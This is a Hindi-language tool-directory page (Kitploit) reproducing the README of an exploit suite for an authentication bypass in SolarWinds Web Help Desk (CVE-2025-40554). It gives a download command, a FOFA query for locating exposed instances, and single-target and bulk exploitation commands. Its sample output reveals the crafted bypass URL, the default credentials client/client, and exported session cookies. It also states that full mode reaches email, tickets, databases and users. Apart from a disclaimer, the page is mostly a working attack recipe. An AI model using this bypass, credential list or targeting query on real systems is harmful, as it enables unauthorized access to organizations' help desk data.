Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-40554 — CVE-2025-40554 शोषण | Kitploit
उपकरण/GitHubGitHub/skynoxk/cve-2025-40554
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

CVE-2025-40554 शोषण

रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-40554 शोषण सूट

SolarWinds Web Help Desk में प्रमाणीकरण बायपास भेद्यता (CVE-2025-40554 / CVE-2025-40536) का पता लगाने और शोषण करने के लिए एक व्यापक सुरक्षा परीक्षण उपकरण।

⚠️ अस्वीकरण

केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए

यह टूल सुरक्षा अनुसंधान, पैठ परीक्षण, और उन प्रणालियों पर भेद्यता मूल्यांकन के लिए प्रदान किया गया है जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए जिम्मेदार नहीं हैं।

🔍 भेद्यता अवलोकन

CVE-2025-40554 SolarWinds Web Help Desk में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो बिना प्रमाणीकरण के हमलावरों को निम्नलिखित की अनुमति देती है:

  • प्रमाणीकरण तंत्र को बायपास करना
  • विशेषाधिकार प्राप्त प्रशासनिक कार्यों तक पहुंचना (प्रमाणीकरण)
  • सिस्टम कॉन्फ़िगरेशन की गणना करना

प्रभावित संस्करण

  • SolarWinds Web Help Desk (विशिष्ट संस्करण जानकारी सत्यापित की जानी चाहिए)
  • पैच किए गए संस्करणों के लिए SolarWinds सुरक्षा सलाहकार देखें

🚀 विशेषताएं

स्वयं जांचें :))

निर्भरताएं:

  • Python 3.6+
  • requests लाइब्रेरी
  • urllib3 लाइब्रेरी

🛠️ स्थापना

root@kitploit:~
# Clone or download the script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Make executable
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 उपयोग

मूल स्कैन (एकल लक्ष्य)

root@kitploit:~
# Simple vulnerability check
python3 CVE-2025-40554.py -t https://target:8443

# With explicit protocol
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

पूर्ण शोषण मोड

root@kitploit:~
# Complete exploitation with session enumeration
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# Skip default credential testing
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

बल्क स्कैनिंग

root@kitploit:~
# Scan multiple targets from file
python3 CVE-2025-40554.py -l targets.txt

# Bulk scan with exploitation
python3 CVE-2025-40554.py -l targets.txt --exploit

# Quiet mode (minimal output)
python3 CVE-2025-40554.py -l targets.txt -q

# Custom output file
python3 CVE-2025-40554.py -l targets.txt -o results.txt

लक्ष्य फ़ाइल प्रारूप

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Comments are supported

🎯 कमांड लाइन विकल्प

📊 आउटपुट उदाहरण

सफल शोषण

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentication Bypass Exploitation Tool                       ║
║     Research & Educational Purposes Only                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789

[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!

[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!

======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================

[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!

[*] Session Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================

बल्क स्कैन परिणाम

root@kitploit:~
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled

[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!

[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed

...

======================================================================
SCAN SUMMARY
======================================================================
Total scanned:     5/5
Vulnerable:        2
With def. creds:   1
======================================================================

[+] Results saved to: vulnerable_targets.txt

🔧 तकनीकी विवरण

शोषण प्रवाह

  1. सत्र स्थापना

    • WHD इंस्टेंस से कनेक्ट करता है
    • कई स्रोतों से WOSID (WebObjects Session ID) निकालता है
    • यदि मौजूद हो तो XSRF टोकन कैप्चर करता है
  2. प्रमाणीकरण बायपास

    • WOSID इंजेक्शन के साथ दुर्भावनापूर्ण URL तैयार करता है
    • WebObjects रूटिंग में पाथ ट्रैवर्सल का शोषण करता है
    • प्रमाणीकरण जांच को बायपास करता है
  3. क्रेडेंशियल परीक्षण (वैकल्पिक)

    • CSRF सुरक्षा के साथ लॉगिन फॉर्म पार्स करता है
    • डिफ़ॉल्ट क्रेडेंशियल (client/client) का परीक्षण करता है
    • सफल प्रमाणीकरण को मान्य करता है
  4. पूर्ण शोषण (--exploit मोड)

    • सत्र कुकीज़ निर्यात करता है
    • ईमेल एक्सेस, टिकट, डेटाबेस, उपयोगकर्ता, (हटाया गया)

भेद्यता संकेतक

यह टूल निम्नलिखित की जांच करके सफल बायपास का पता लगाता है:

  • externalAuthContainer - बाहरी प्रमाणीकरण कॉन्फ़िगरेशन
  • JSONRpcClient - API क्लाइंट एक्सपोज़र
  • SAML 2.0 - SSO कॉन्फ़िगरेशन
  • LoginPref - लॉगिन प्राथमिकता सेटिंग्स
  • authMode - प्रमाणीकरण मोड सेटिंग्स

🤝 योगदान

योगदान का स्वागत है.....

📚 संदर्भ

  • CVE-2025-40554 विवरण
  • CVE-2025-40536 विवरण
  • SolarWinds सुरक्षा सलाहकार
  • WebObjects फ्रेमवर्क दस्तावेज़ीकरण

📄 लाइसेंस

यह टूल बिना किसी वारंटी के "जैसा है" प्रदान किया गया है। अपने जोखिम पर उपयोग करें।

👤 लेखक

Skynoxk


याद रखें: हमेशा नैतिक और कानूनी रूप से हैक करें। अनधिकृत पहुंच एक अपराध है।

टूल डाउनलोड करें
विकल्पविवरण
-t, --target URLपरीक्षण के लिए एकल लक्ष्य URL
-l, --list FILEलक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--exploitगणना के साथ पूर्ण शोषण मोड सक्षम करें
--no-loginडिफ़ॉल्ट क्रेडेंशियल परीक्षण छोड़ें
-o, --output FILEभेद्य लक्ष्यों के लिए आउटपुट फ़ाइल (डिफ़ॉल्ट: vulnerable_targets.txt)
-q, --quietन्यूनतम आउटपुट मोड (बल्क स्कैन के लिए उपयोगी)